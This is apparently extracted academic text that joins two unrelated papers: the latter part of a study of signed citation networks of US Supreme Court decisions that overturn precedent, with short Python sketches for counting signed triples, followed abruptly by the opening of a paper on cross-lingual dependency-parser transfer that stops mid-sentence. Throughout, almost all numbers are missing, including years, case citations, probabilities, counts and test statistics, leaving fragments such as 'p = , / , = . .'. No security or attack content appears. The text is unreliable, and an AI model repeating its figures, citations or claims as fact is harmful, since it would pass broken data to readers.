“the right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no warrants shall issue, but upon probable cause, supported by oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized.” the fifth amendment, in full, states: “no person shall be held to answer for a capital, or otherwise infamous crime, unless on a presentment or indictment of a grand jury, except in cases arising in the land or naval forces, or in the militia, when in actual service in time of war or public danger; nor shall any person be subject for the same of- fense to be twice put in jeopardy of life or limb; nor shall be compelled in any criminal case to be a witness against himself, nor be deprived of life, liberty, or property, without due process of law; nor shall private property be taken for public use, without just compensation.” connections earlier courts that were willing to give the police free rein in gathering evidence even though their practices for doing so frequently violated these amendments . this expansive view regarding rights was especially the case after justice frankfurter, a conservative jus- tice, left the warren court. the overturned decision, us , was authored by frankfurter. another overturned decision, us , was a per curiam (unsigned) decision – but there were dissenting justic- es. justice frankfurter was not among the dissenters and, by inference, it is fair to claim he supported this decision. the overturning decision, us , was authored by his replacement of the court, justice goldberg. 
it is reasonable to conjecture that, when courts overturn themselves, the most likely reason is the change of its personnel. this is a hypothesis worthy of future exploration. the other decisions overturned by us all concerned earlier decisions accepting the use of police procedures violating the us constitution. the decision in us , a landmark case accord- ing to multiple sources, was emphatic about rights against self-incrimination guaranteed under the fifth amendment. earlier courts were willing to declare that if defendants “took the fifth” it was, in effect, an admission of guilt – with convictions following frequently. figure contains a six-vertex weak component with three landmark decisions. the earliest of them is us , plessy v. ferguson. decided in by the fuller court, it established the “separate but equal” doctrine regarding race as being constitutional. while the separation (segregation) of races was real, the equal part was far from the reality for the experi- ence of african american citizens being denied ac- cess to public spaces. this decision was overturned by two decisions made by the warren court. one was us , brown v. the board of education of tope- ka, kansas, which ruled that state laws permitting the establishment of separate schools for black and white students violated the equal protection clause of the fourteenth amendment. two years later, us , gayle v. browder, did the same regarding racial seg- regation in buses in montgomery, alabama. other re- lated decisions were overturned also, something that would be missed under the dyadic approach to con- sidering the overturning of supreme court decisions. this figure shows emphatically the importance of ex- amining decisions in a broader context than simple pairwise examination of decisions while ignoring the broader context in which these decisions were made. the substantive issues for these decisions were: (a) civil rights and segregation under the “separate but equal” doctrine; and (b) targeting minorities, especially blacks (but also chinese people at the time of the earliest overturned decision). the constitutional issues were twofold. one was, as noted above, the fourteenth amendment (regarding equal protec- tion). the second was the ability of federal courts figure : a six-vertex weak component. note: the decisions are labeled by the years they were made, and the notation used by the supreme court to identify specific decisions. the fourteenth amendment (section ) states: “all per- sons born or naturalized in the united states, and subject to the jurisdiction thereof, are citizens of the united states and of the state wherein they reside. no state shall make or enforce any law which shall abridge the privileges or immunities of citizens of the united states; nor shall any state deprive any person of life, liberty, or property, without due process of law; nor deny to any person within its juris- diction the equal protection of the laws.” this is a part of what fowler and jeon ( ) noted regarding the warren court – but with a very different interpretation. signed networks for the supreme court citation network to intervene at the state level, something frequently opposed under the rubric of “state’s rights.” this is another example of the warren court overturning precedents. both of these overturning decisions were hailed as a part of major victory for the civil rights movement. of course, they were. 
but these decisions also set off a fire storm of reactions both in the legal arena and, perhaps more consequentially, with illegal (and fre- quently very violent) actions including many lynchings of black people, when white people, especially – but not exclusively – in the south, took exception to these rulings and targeted african americans. this example makes clear also the necessity for considering the social and legislative contexts within which supreme courts make their decisions, a point made in batagelj et al. ( , chapter ). figure shows a five-vertex weak component with a two-step path of overturning decisions . the left-most decision was made by the warren court. the remaining decisions were made by the vinson court. the substantive issue was the admissibility of evidence collected without a warrant. there were two critical constitutional issues. one is the fourth amendment (regarding search and seizure) and the fourteenth amendment (due process). it appears that there was some confusion in the vinson court on these issues when it overturned itself. but, on closer inspection, when this court did this, it appears it was due to changes in its composition of justices, a topic worthy of further consideration. studying these three weak components of over- turning and overturned decisions made by this court shows the interplay between the substantive issues considered for specific decisions, the constitutional principles involved, the positions of justices regarding both, and the contexts within which overturning de- cisions are made. considering the phenomenon of overturning by the supreme court as a network, rather than focusing solely on dyadic ties, is merited. we now tackle a different topic in which the negative overturning links between supreme court de- cisions are placed in a more general network context. for this, we reconsider the notion of inconsistency that may exist when courts overrule their prior decisions. mobilizing ideas regarding inconsistencies when decisions are overturned figure displays three potentially inconsistent triples. the set of all possible decision triples are shown in figure . what are the counts of all these triples in the signed supreme court network? the triples in the top row are logically consistent while the triples in the bottom row are inconsistent. however, the one on the right of the lower panel is ambiguous. it suggests complete incoherence. for- tunately, as shown below, such triples do not exist in our data. table shows the distribution of the eight types of potential triples shown in figure . the method for doing this is described in doreian and mrvar ( ). figure : a five-vertex weak component. note: the decisions are labeled by the years they were made, and the notation used by the supreme court to identify specific decisions. the longest all negative path in these data featured the rehnquist court overturning a decision of the warren court which overturned a vinson court decision that over- turned one of its own decisions. connections given the overwhelming number of positive ties in this network, the large number of all positive triples is not a surprise. a surprise, at least to us, was the number of inconsistent triples in this network. the obvi- ous question is simple to state: is this distribution of triples types different from what would be expected by chance? this is an important issue. without mak- ing sure that this is not what would be expected by chance, all we have are simple descriptions. 
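counting the eight triple types can be sketched as follows. the fragment assumes the signed directed network built earlier and the fact that, in a time-ordered citation network, a closed triple always has the transitive shape (the latest decision cites both earlier ones, and the middle one cites the earliest); the mapping from sign patterns to the specific type numbers in the figure is not reproduced here.

```python
from collections import Counter

def signed_triple_census(g):
    """
    For every closed citation triple (k cites j, k cites i, and j cites i),
    record the signs of its three ties; there are 2**3 = 8 possible patterns.
    """
    census = Counter()
    for j, i in g.edges():                 # j cites i
        for k in g.predecessors(j):        # k cites j
            if g.has_edge(k, i):           # k also cites i -> closed triple
                pattern = (g[k][j]["sign"], g[k][i]["sign"], g[j][i]["sign"])
                census[pattern] += 1
    return census

def count_by_negatives(census):
    """Collapse the census by the number of negative ties (0, 1, 2 or 3)."""
    by_neg = Counter()
    for pattern, n in census.items():
        by_neg[list(pattern).count(-1)] += n
    # in the scheme above, the triples with exactly one negative tie are the inconsistent ones
    return by_neg
```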
to tackle this issue, we propose two null models. one attempts to get directly at the expected dis- tribution of triple types under randomness. in this network, there were , decisions; , positive ties; and negative ties. the total number of ties is , . two probabilities can be defined. let p de- note the probability of a positive tie. from the data, p = , / , = . . similarly, letting n de- note the probability of a negative tie in this network, n = - p = . . the probability for the all positive figure : all possible triples between three supreme court decisions. table . counts of consistent and inconsistent triple types in the expanded signed network. consistent triples and triple counts inconsistent triples and triple counts all positive , one negative- type , two negative ties type one negative- type , two negative ties type one negative- type , two negative ties type all negative total , total , we are reporting these probabilities to four places of decimals. in all our calculations, we used ten places of decimals. signed networks for the supreme court citation network triple is p . the resulting probability is . . for each of the triples with two negative ties, the prob- ability is pn . the resulting probability for them is . . for each of the triples with one negative tie, the probability is p n, the value for which is . . using these probabilities, we get the expected values shown in table . defining χ for these distributions as Σ (o - e) /e, we get χ ( ) = , . which is far larger than any- thing reported in all available tables for this measure regarding significance. the observed distribution of triple types is very far from being random. our second approach toward establishing a random null model took a different tack. given the directed ties in the signed networks, we randomly selected arcs (their number in this network) and assigned them the value - . the rest were set to + . this experiment was repeated , times. the dis- tributions for all triple types were highly symmetric with the mean and median values of the distributions being very close. table shows the observed and “approximate” expected distributions for triple types using the medians from the generated distributions of the triple types. using the same definition for χ and applying it for ta- ble yields χ ( ) = , . . this value is also extremely significant. the observed distribution of the observed triad types is very far from being random. these results make it abundantly clear that the distribution of triple types cannot have come from random processes. the summary substantive details of comparing the observed distributions with those predicated in random processes are: . compared to a random distribution of signs of the network, empirically, there are far fewer observed all-positive directed triples even though they are so frequent in the observed network. this is a surprising and most non-ob- vious result. . compared to a random distribution of signs on the network, there are more observed imbal- anced triples of all three types when there was one negative tie . for a logically consistent and reasoned decision-making world, this must be viewed as very surprising. . compared to a random distribution of signs on the network, there are more observed balanced triples of types and . . compared to a random distribution of signs on the network, there are slightly fewer observed balanced triples of type . 
given the observed distribution of triple types, it became imperative to examine closely the distri- butions shown in table . these numbers can be assessed in several ways. if the measure of con- sistency is the proportion of consistent triples, it is . , suggesting that there is, overall, a high level of consistency. however, we think this is misleading as it is driven by the huge number of positive ties. if the all-positive triples (the left-most triple in the top row of figure ) are ignored, the overall meas- ure of consistency plummets to . , suggesting a very high level of inconsistency when overturning prior decisions is examined closely. at best, this is troubling and indicates that when the supreme court overturns prior decisions, the rationale for doing so is both selective and inconsistent. table . the first observed and expected distribution of ties in the signed network. triple type expected number, e observed number, o all positive , , two negative ties type two negative ties type two negative ties type one negative-type , one negative-type , one negative-type , all negative the all negative triple did not exist in either the observed world nor one in a world predicated by chance. connections empirical examples of the inconsistent triple types we include two additional figures produced from the signed network having both positive and negative ties. they serve two purposes. one is to show the exist- ence of inconsistent triples in a broader context. the other to examine what is involved by their presence, a topic returning us to the question we posed earlier: does the presence of inconsistent triples matter? in figure , there are eight inconsistent triples iden- tified as “one negative ” and two inconsistent triples identified as “one negative ,” as defined in figure . these inconstant triples exist. equally important, both of the overturning links in figure are instances of complete overturning of prior decisions – there is no need to deal with the issue of whether these decisions were overturned partially. yet, as shown in this figure, they still get cited despite having been overturned. we return to this issue in section “conclusions, a research agenda and a speculation about stare decesis.” the substantive issues of the decisions shown in figure deal with governmental personnel, or seaman, employed on us ocean going vessels sailing under the authority of admiralty law, a very complex legal domain. the decisions included whether com- pensation is due to men who were injured or killed on these vessels and how wages are paid (or not). most of the decisions were made by the vinson court. the overturning decision, us concerned a peruvian vessel that has been seized by the usa. this decision mandated the return of the vessel to peruvian com- pany owning it. more generally, admiralty law, known also as maritime law, is a large body of law, both na- tional and international, governing nautical issues and private maritime disputes. it deals with both domes- tic law on maritime activities, and private international law governing the relationships between private par- ties operating or using ocean going ships. the issues are remarkably complex. that there is confusion in dealing with them may not be too surprising. yet it is reasonable to expect the highest court in the usa would issue clear and consistent rulings. the second overturning decision shown in figure has us overturning us . 
the overturned decision held for an injured seaman, that he is entitled to sue the operating company for damages in a state court and to have a jury trial under section of the merchant marine act of ( known also as the jones act), even if he was technically an employee of the united states. the overturning decision declared: “a general agent employed by the united states under the terms of the war-time standard form of general agency agreement to manage certain phases of the business of a ship owned by the united states and operated by the war shipping administration is not liable under section of the mer- chant marine act of , known as the jones act, to a member of the crew of the ship who suffered physical injury through the negligence of its master and officers, when the injury occurred after march , , the date of enactment of the war shipping administration act, known as the clarification act (https://supreme.justia. com/cases/federal/us/ / /).” figure shows a set of decisions where there are instances of inconsistent triples identified as “one negative .” again, every overturning citation tie to an earlier decision overturned it completely. table . the expected distribution of triple types based on simulations and the observed distribution. triple type expected observed all positive , , two negative ties type two negative ties type two negative ties type one negative-type , one negative-type , one negative-type , all negative signed networks for the supreme court citation network figure : examples of two types of inconsistent signed triples. note: the decisions are labeled by the years they were made, and the notation used by the supreme court to identify specific decisions. figure : examples of the third type of inconsistent signed triples. note: the decisions are labeled by the years they were made, and the notation used by the supreme court to identify specific decisions. connections the substantive issue featured in the decisions shown in figure concern systematic efforts by election officials, especially in the south, to prevent african americans from voting through direct disen- franchisement and by using strategies such as poll taxes and literacy tests to prevent them from voting. there are four overturning decisions. the warren court decision, us , ruled explicitly that a virginia law allowing the use of poll taxes to prevent african americans from voting was unconstitutional. a decision by the burger court, us , ruled that a state law requiring residency requirements for black voters before they could vote was an unconstitutional infringement upon the right to vote and the right to travel. the decision, us , ruled that altering ballots made by black americans was totally uncon- stitutional and explicitly overruled us . the de- cision, us was more unusual in that it held that a ruling of a us district court, holding that a law au- thorizing the federal government to bring civil actions against state officials for discriminating against black citizens was unconstitutional. even so, it is clear that there had been a systematic effort to prevent minori- ties from voting, albeit with some ambiguity. as shown in table , there are , inconsist- ent signed triples. their presence is troubling as it suggests that in remaking law by overturning earlier precedents, the relevant issues are not thought through in a thorough fashion. 
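the question raised above, of completely overturned decisions that nevertheless keep being cited, can also be posed mechanically. a sketch, assuming the signed network from the earlier fragments plus two lookup tables whose exact form is an assumption here (a dict of completely overturned decisions with the year they were overturned, and a dict giving each decision's year):

```python
def overturned_but_still_cited(g, completely_overturned, decision_year):
    """
    For each completely overturned decision, list the later decisions that still
    cite it positively after the year in which it was overturned.
    """
    offenders = {}
    for dec, year_overturned in completely_overturned.items():
        later_citers = [
            u for u in g.predecessors(dec)
            if g[u][dec]["sign"] > 0 and decision_year.get(u, 0) > year_overturned
        ]
        if later_citers:
            offenders[dec] = sorted(later_citers)
    return offenders
```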
conclusions, a research agenda and a speculation about stare decesis this paper introduced the idea of studying the citation network of ties between supreme court decisions in a new fashion by focusing on the court overturning some of its prior decisions. when this court does this, these overturning citation ties were defined as negative links between decisions in this citation network. an obvious question is simple to state: what is the nature and structure of these signed networks? we provided multiple descriptions and analyses to respond to this question. we asked how much overturning of prior decisions exists? we estab- lished a list of all decisions overturning prior decisions using multiple sources. we raised the issue of why prior decisions are overturned and offered some pro- visional answers regarding the mechanisms leading to overturning of precedent. the results in sections “mobilizing ideas regard- ing inconsistencies when decisions are overturned and empirical examples of the inconsistent triple types” suggest that new insights can be obtained by considering the overturning of prior decisions us- ing signed citation networks. more importantly, in our view, is whether this court overturning earlier decisions are made in a coherent and consistent fashion. our results show that, far too often, this was not the case. while the legal and political issues are important, it seems reasonable to expect the highest court in the land being capable of paying close attention to all of the legal issues involved when making its decisions. the presence of so many inconsistent triples is dis- turbing. it suggests a daunting research agenda with multiple components. first, all the weak components of the network with only the negative ties must be ex- amined to generate a more general understanding of the substantive issues and constitutional principles involved when earlier decisions are overturned and what are the rationales for rejecting precedent. second, it will be useful to separate the overturn- ing links according the chief justices of the supreme court over time. this implies two studies. one is a close examination of the overturning links between different courts. put differently, this amounts to unpacking the links shown in figure . the other is to study courts overturning themselves. third, it will be necessary to examine the voting alliances of justices when they reach decisions, especially regarding their legal phi- losophies and ideological positions. this needs to be done for each term of the court for which there is enough information. fourth, we need to understand why completely overturned decisions are still cited by subsequent decisions. there are far too many of them to be ignored. that completely overturned decisions are still cited suggests a level of logical inconsistency that cannot be accepted and calls into question the extent to which stare decisis is operative. putting together the findings that there are many, perhaps far too many, logically inconsistent signed triples, suggests that there is a major problem with the operation of the supreme court when it decides to overturn earlier decisions in ways that do not appear to consider the potential logical inconsisten- cies beyond the specific decisions being made. examining the distribution of the signed triples, as was done herein, along with the idea that many completely overturned decisions are cited by subse- quent decisions, raises questions about the nature of stare decesis. 
if a decision has been overturned completely, how is it still cited as legitimate prece- dent? it is reasonable to conjecture that, rather than being the bedrock of the us legal system, this al- leged respect for precedent may be nothing more than a convenient fiction. we finish with some speculations regarding stare decesis for the current roberts court following to signed networks for the supreme court citation network additions of justices gorsuch and kavanaugh to this body. marcus ( ), representing the federalist society, started in his new york times opinion piece by claiming “the confirmation of brett kavanaugh as an associate justice of the supreme court is a con- servative victory of generational proportions. it is the capstone of a decades long project to fundamentally change the judicial branch of the government in ways that can open heretofore locked doors on abortion, affirmative action, gun rights and religious free- dom (emphases added).” this reveals an intended goal of overruling earlier decisions in all these sub- stantive domains. if so, it implies a radical rejection of stare decisis. blow ( ), in another new york times opinion piece, noted “a much larger plan by conservatives to fundamentally change the american political structure so that it enshrines and protects white male power even after america’s changing demographics and mores move away from that power.” while written from very different perspectives, both opinion pieces agree on the intended scope of judicial changes envisioned by conservatives. given these assessments of their long-term goals, it is reasonable to predict that the number of overturning decisions made by the roberts court will increase, with stare decesis being rejected more often if the long-term goals of conservatives are re- alized. the rehnquist court had a fixed membership for terms from – through – . during this period, eight of the nine justices were in the majority more often than they were dissent- ing. the one exception was justice stevens. during this period, the number of – decisions was infre- quent despite the greater attention given to them in the press. one possible reason is that justices kennedy and o’connor were often seen as swing votes helping to moderate the supreme court deci- sions. there appears to be no such justices on the roberts court with two solid blocs of five justices nominated by republican presidents and four nomi- nated by democratic presidents. we predict that the number of – decisions will jump for the roberts court. the results reported here will help to provide a background for assessing this claim in a broader historical context. acknowledgments the authors appreciate the very helpful comments of the reviewers and the editor and their suggestions for the resulting revisions. references batagelj, v. and mrvar, a. . pajek – a program for large network analysis. connections ( ): – . batagelj, v. doreian, p. ferligoj, a. and n. kej žar, , understanding large temporal and spatial net- works and spatial networks: exploration, pattern searching and network evolution, wiley, chichester. blow, c. m. . liberals: this is war. new york times op-ed, october . a . brenner, s. and spaeth, h. j. . stare indeci- sis: the alteration of precedent on the supreme court, – , cambridge university press, cambridge. doreian, p. and mrvar, a. . identifying fragments in networks for structural balance and tracking the levels of balance over time. connections vol ( ): – . epstein, l., segal, j. a., spaeth, h. j. and walker, t. g. . 
the supreme court compendium: data, de- cisions and developments th ed., sage, los angeles. eskridge, w. n. jr. . overruling statutory prec- edents. faculty scholarship series. . https://digital- commons.law.yale.edu/fss_papers/ . fowler, j. h. and jeon, s. . the authority of us precedent. social networks ( ): – . gerhardt, m. j. . the power of precedent, oxford university press, oxford. government printing office. . supreme court deci- sions overruled by subsequent decision. available at: www. gpo.gov/fdsys/pkg/gpo-conan- /pdf/gpo-co- nan- - .pdf (accessed may , ). hall, k. l. (ed.), . the oxford guide to the supreme court of the united states, the oxford university press, new york, ny. irons, p. . a people’s history of the supreme court: the men and women whose cases and decisions have shaped our constitution, london: penguin. kleinberg, j. m. . authoritative sources in a hy- perlinked environment. proceedings of the acm-siam symposium on discrete algorithms: – . marcus, d. . conservatives are wrong to gloat about kavanaugh. new york times op-ed, october . a . powe, l. a. jr. . the supreme court and the american elite, harvard university press, cambridge, ma. root, d. . overruled: the long war for control of the us supreme court, palgrave macmillan, new york, ny. spaeth, h. j. and segal, j. a. . majority rule or minority will: adherence to precedent on the us supreme court, cambridge university press, cambridge. spriggs, j. f. ii and hansford, t. g. . explain- ing the overruling of us supreme court precedent. the journal of politics ( ) – . vile, j. r. . supreme court decisions: summaries of leading cases in us constitutional law th ed., row- man and littlefield, lanham. cross-lingual syntactic transfer with limited resources mohammad sadegh rasooli and michael collins∗ department of computer science, columbia university new york, ny , usa {rasooli,mcollins}@cs.columbia.edu abstract we describe a simple but effective method for cross-lingual syntactic transfer of depen- dency parsers, in the scenario where a large amount of translation data is not available. this method makes use of three steps: ) a method for deriving cross-lingual word clus- ters, which can then be used in a multilingual parser; ) a method for transferring lexical information from a target language to source language treebanks; ) a method for integrat- ing these steps with the density-driven annota- tion projection method of rasooli and collins ( ). experiments show improvements over the state-of-the-art in several languages used in previous work, in a setting where the only source of translation data is the bible, a con- siderably smaller corpus than the europarl corpus used in previous work. results using the europarl corpus as a source of translation data show additional improvements over the results of rasooli and collins ( ). we con- clude with results on datasets from the uni- versal dependencies corpora. introduction creating manually-annotated syntactic treebanks is an expensive and time consuming task. recently there has been a great deal of interest in cross-lingual syntactic transfer, where a parsing model is trained for some language of interest, using only treebanks in other languages. there is a clear motivation for this in building parsing models for languages for which treebank data is unavailable. methods ∗on leave at google inc. new york. 
for syntactic transfer include annotation projection methods (hwa et al., ; ganchev et al., ; mcdonald et al., ; ma and xia, ; rasooli and collins, ; lacroix et al., ; agić et al., ), learning of delexicalized models on univer- sal treebanks (zeman and resnik, ; mcdon- ald et al., ; täckström et al., ; rosa and zabokrtsky, ), treebank translation (tiedemann et al., ; tiedemann, ; tiedemann and agić, ) and methods that leverage cross-lingual rep- resentations of word clusters, embeddings or dictio- naries (täckström et al., ; durrett et al., ; duong et al., a; zhang and barzilay, ; xiao and guo, ; guo et al., ; guo et al., ; ammar et al., a). this paper considers the problem of cross-lingual syntactic transfer with limited resources of mono- lingual and translation data. specifically, we use the bible corpus of christodouloupoulos and steed- man ( ) as a source of translation data, and wikipedia as a source of monolingual data. we de- liberately limit ourselves to the use of bible trans- lation data because it is available for a very broad set of languages: the data from christodouloupou- los and steedman ( ) includes data from languages. the bible data contains a much smaller set of sentences (around , ) than other transla- tion corpora, for example europarl (koehn, ), which has around million sentences per language pair. this makes it a considerably more challeng- ing corpus to work with. similarly, our choice of wikipedia as the source of monolingual data is mo- tivated by the availability of wikipedia data in a very broad set of languages. transactions of the association for computational linguistics, vol. , pp. – , . action editor: yuji matsumoto. submission batch: / ; revision batch: / ; / ; published / . c© association for computational linguistics. distributed under a cc-by . license. we introduce a set of simple but effective methods for syntactic transfer, as follows: • we describe a method for deriving cross- lingual clusters, where words from different languages with a similar syntactic or seman- tic role are grouped in the same cluster. these clusters can then be used as features in a shift- reduce dependency parser. • we describe a method for transfer of lexical in- formation from the target language into source language treebanks, using word-to-word trans- lation dictionaries derived from parallel cor- pora. lexical features from the target language can then be integrated in parsing. • we describe a method that integrates the above two approaches with the density-driven ap- proach to annotation projection described by rasooli and collins ( ). experiments show that our model outperforms previous work on a set of european languages from the google universal treebank (mcdonald et al., ). we achieve . % average unlabeled at- tachment score (uas) on these languages; in com- parison the work of zhang and barzilay ( ), guo et al. ( ) and ammar et al. ( b) have a uas of . %, . % and . %, respectively. all of these previous works make use of the much larger europarl (koehn, ) corpus to derive lex- ical representations. when using europarl data in- stead of the bible, our approach gives . % accu- racy, a . % absolute improvement over rasooli and collins ( ). finally, we conduct experiments on datasets ( languages) in the universal depen- dencies v . (nivre et al., ) corpus. our method has an average unlabeled dependency accuracy of . % for these languages, more than % higher than the method of rasooli and collins ( ). thir- teen datasets ( languages) have accuracies higher than . %. 
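the background section below formalizes the parser as a linear model over a concatenation of feature blocks, trained with the averaged structured perceptron. a minimal numeric sketch of that scheme is given here; the block contents are placeholders, not the actual feature templates of the paper (those are listed in its appendix a).

```python
import numpy as np

def feature_vector(phi_pos, phi_cluster, phi_lex):
    """phi(x, y): concatenation of the unlexicalized (POS), cluster and lexical blocks."""
    return np.concatenate([phi_pos, phi_cluster, phi_lex])

def score(theta, phi):
    """The model scores a candidate parse y for sentence x as theta . phi(x, y)."""
    return float(np.dot(theta, phi))

def perceptron_update(theta, phi_gold, phi_predicted):
    """One structured-perceptron step: promote gold features, demote predicted ones.
    Averaging of the weight vectors over updates is omitted for brevity."""
    return theta + (phi_gold - phi_predicted)
```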
background this section gives a description of the underlying parsing models used in our experiments, the data the parser code is available at https://github. com/rasoolims/yaraparser/tree/transfer. sets used, and a baseline approach based on delexi- calized parsing models. . the parsing model we assume that the parsing model is a discriminative linear model, where given a sentence x, and a set of candidate parses y(x), the output from the model is y∗(x) = arg max y∈y(x) θ ·φ(x,y) where θ ∈ rd is a parameter vector, and φ(x,y) is a feature vector for the pair (x,y). in our experi- ments we use the shift-reduce dependency parser of rasooli and tetreault ( ), which is an extension of the approach in zhang and nivre ( ). the parser is trained using the averaged structured per- ceptron (collins, ). we assume that the feature vector φ(x,y) is the concatenation of three feature vectors: • φ(p)(x,y) is an unlexicalized set of features. each such feature may depend on the part-of- speech (pos) tag of words in the sentence, but does not depend on the identity of individual words in the sentence. • φ(c)(x,y) is a set of cluster features. these fea- tures require access to a dictionary that maps each word in the sentence to an underlying cluster identity. clusters may, for example, be learned using the brown clustering algorithm (brown et al., ). the features may make use of cluster identities in combination with pos tags. • φ(l)(x,y) is a set of lexicalized features. each such feature may depend directly on word iden- tities in the sentence. these features may also depend on part-of-speech tags or cluster infor- mation, in conjunction with lexical informa- tion. appendix a has a complete description of the fea- tures used in our experiments. . data assumptions throughout this paper we will assume that we have m source languages l . . .lm, and a single tar- get language lm+ . we assume the following data sources: source language treebanks. we have a treebank ti for each language i ∈{ . . .m}. part-of-speech (pos) data. we have hand- annotated pos data for all languages l . . .lm+ . we assume that the data uses a universal pos set that is common across all languages. monolingual data. we have monolingual, raw text for each of the (m+ ) languages. we use di to refer to the monolingual data for the ith language. translation data. we have translation data for all language pairs. we use bi,j to refer to transla- tion data for the language pair (i,j) where i,j ∈ { . . . (m + )} and i = j. in our main experiments we use the google universal treebank (mcdonald et al., ) as our source language treebanks (this treebank pro- vides universal dependency relations and pos tags), wikipedia data as our monolingual data, and the bible from christodouloupoulos and steedman ( ) as the source of our translation data. in ad- ditional experiments we use the europarl corpus as a source of translation data, in order to measure the impact of using the smaller bible corpus. . a baseline approach: delexicalized parsers with self-training given the data assumption of a universal pos set, the feature vectors φ(p)(x,y) can be shared across languages. a simple approach is then to simply train a delexicalized parser using treebanks t . . .tm, us- ing the representation φ(x,y) = φ(p)(x,y) (see (mcdonald et al., ; täckström et al., )). our baseline approach makes use of a delexical- ized parser, with two refinements: wals properties. 
we use the six properties from the world atlas of language structures (wals) (dryer and haspelmath, ) to select a subset of closely related languages for each target language. these properties are shown in table . the model for a target language is trained on treebank data from languages where at least out of wals prop- erties are common between the source and target we also train our best performing model on the newly re- leased universal treebank v . (nivre et al., ). see § . for more details. feature description a order of subject and verb a order of object and verb a order of adposition and noun phrase a order of genitive and noun a order of adjective and noun a order of demonstrative and noun table : the six properties from the world atlas of lan- guage structures (wals) (dryer and haspelmath, ) used to select the source languages for each target lan- guage in our experiments. language. this gives a slightly stronger baseline. our experiments showed an improvement in aver- age labeled dependency accuracy for the languages from . % to . %. table shows the set of source languages used for each target language. these source languages are used for all experiments in the paper. self-training. we use self-training (mcclosky et al., ) to further improve parsing performance. specifically, we first train a delexicalized model on treebanks t . . .tm; then use the resulting model to parse a dataset tm+ that includes target-language sentences which have pos tags but do not have de- pendency structures. we finally use the automati- cally parsed data t ′m+ as the treebank data and re- train the model. this last model is trained using all features (unlexicalized, clusters, and lexicalized). self-training in this way gives an improvement in la- beled accuracy from . % to . %. . translation dictionaries our only use of the translation data bi,j for i,j ∈ { . . . (m + )} is to construct a translation dictio- nary t(w,i,j). here i and j are two languages, w is a word in language li, and the output w′ = t(w,i,j) is a word in language lj corresponding to the most frequent translation of w into this language. we define the function t(w,i,j) as follows: we first run the giza++ alignment process (och and ney, ) on the data bi,j. we then keep inter- sected alignments between sentences in the two lan- guages. finally, for each word w in li, we define there was no effort to optimize this choice; future work may consider more sophisticated sharing schemes. target sources en de, fr, pt, sv de en, fr, pt es fr, it, pt fr en, de, es, it, pt, sv it es, fr, pt pt en, de, es, fr, it, sv sv en, fr, pt table : the selected source languages for each target language in the google universal treebank v (mcdonald et al., ). a language is chosen as a source language if it has at least out of wals properties in common with the target language. w′ = t(w,i,j) to be the target language word most frequently aligned to w in the aligned data. if a word w is never seen aligned to a target language word w′, we define t(w,i,j) = null. our approach we now describe an approach that gives significant improvements over the baseline. § . describes a method for deriving cross-lingual clusters, allowing us to add cluster features φ(c)(x,y) to the model. § . describes a method for adding lexical features φ(l)(x,y) to the model. § . describes a method for integrating the approach with the density-driven ap- proach of rasooli and collins ( ). finally, § describes experiments. 
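the dictionary construction just described amounts to counting intersected alignment links and keeping, for each source word, the target word it is most frequently aligned to (or null if it is never aligned). the following is a minimal sketch of that step, assuming the intersected alignments are already available as lists of (source index, target index) pairs per sentence pair; the data structures and names are illustrative, not the authors' implementation:

```python
from collections import Counter, defaultdict

def build_translation_dict(bitext, alignments):
    """bitext: list of (source_tokens, target_tokens) sentence pairs;
    alignments: for each pair, the intersected links as (src_idx, tgt_idx).
    Returns, for every source word, its most frequently aligned target word."""
    counts = defaultdict(Counter)
    for (src, tgt), links in zip(bitext, alignments):
        for s_i, t_j in links:
            counts[src[s_i]][tgt[t_j]] += 1
    return {w: c.most_common(1)[0][0] for w, c in counts.items()}

def t(dictionary, w):
    """t(w, i, j) for one fixed language pair: None plays the role of NULL."""
    return dictionary.get(w)
```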
we show that each of the above steps leads to improvements in accuracy. . learning cross-lingual clusters we now describe a method for learning cross- lingual clusters. this follows previous work on cross-lingual clustering algorithms (täckström et al., ). a clustering is a function c(w) that maps each word w in a vocabulary to a cluster c(w) ∈ { . . .k}, where k is the number of clusters. a hi- erarchical clustering is a function c(w,l) that maps a word w together with an integer l to a cluster at level l in the hierarchy. as one example, the brown clustering algorithm (brown et al., ) gives a hi- erarchical clustering. the level l allows cluster fea- tures at different levels of granularity. a cross-lingual hierarchical clustering is a func- tion c(w,l) where the clusters are shared across the (m + ) languages of interest. that is, the word w inputs: ) monolingual texts di for i = . . . (m + ); ) a function t(w,i,j) that translates a word w ∈ li to w′ ∈lj ; and ) a parameter α such that < α < . algorithm: d = {} for i = to m + do for each sentence s ∈di do for p = to |s| do sample ā ∼ [ , ) if ā ≥ α then continue sample j ∼ unif{ , ...,m + }\{i} w′ = t(sp, i,j) if w′ = null then set sp = w′ d = d∪ {s} use the algorithm of stratos et al. ( ) on d to learn a clustering c. output: the clustering c. figure : an algorithm for learning a cross-lingual clus- tering. in our experiments we used the parameter value α = . . can be from any of the (m + ) languages. ideally, a cross-lingual clustering should put words across different languages which have a similar syntactic and/or semantic role in the same cluster. there is a clear motivation for cross-lingual clustering in the parsing context. we can use the cluster-based fea- tures φ(c)(x,y) on the source language treebanks t . . .tm, and these features will now generalize be- yond these treebanks to the target language lm+ . we learn a cross-lingual clustering by leverag- ing the monolingual data sets d . . .dm+ , together with the translation dictionaries t(w,i,j) learned from the translation data. figure shows the algo- rithm that learns a cross-lingual clustering. the al- gorithm first prepares a multilingual corpus, as fol- lows: for each sentence s in the monolingual data di, for each word in s, with probability α, we re- place the word with its translation into some ran- domly chosen language. once this data is created, we can easily obtain a cross-lingual clustering. fig- ure shows the complete algorithm. the intuition behind this method is that by creating the cross- lingual data in this way, we bias the clustering al- gorithm towards putting words that are translations of each other in the same cluster. . treebank lexicalization we now describe how to introduce lexical repre- sentations φ(l)(x,y) to the model. our approach is simple: we take the treebank data t . . .tm for the m source languages, together with the transla- tion lexicons t(w,i,m + ). for any word w in the source treebank data, we can look up its transla- tion t(w,i,m + ) in the lexicon, and add this trans- lated form to the underlying sentence. features can now consider lexical identities derived in this way. in many cases the resulting translation will be the null word, leading to the absence of lexical fea- tures. however, the representations φ(p)(x,y) and φ(c)(x,y) still apply in this case, so the model is ro- bust to some words having a null translation. . 
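the clustering procedure given in the figure above can be restated as follows: with probability α, each token of each monolingual sentence is replaced by its dictionary translation into a randomly chosen other language, and the clustering algorithm of stratos et al. ( ) is then run on the resulting mixed corpus. note that the extracted condition "if w′ = null then set sp = w′" reads most naturally as replacing the word only when its translation is not null. the sketch below follows that reading; the value of α used in the paper is not reproduced here, and all names are illustrative:

```python
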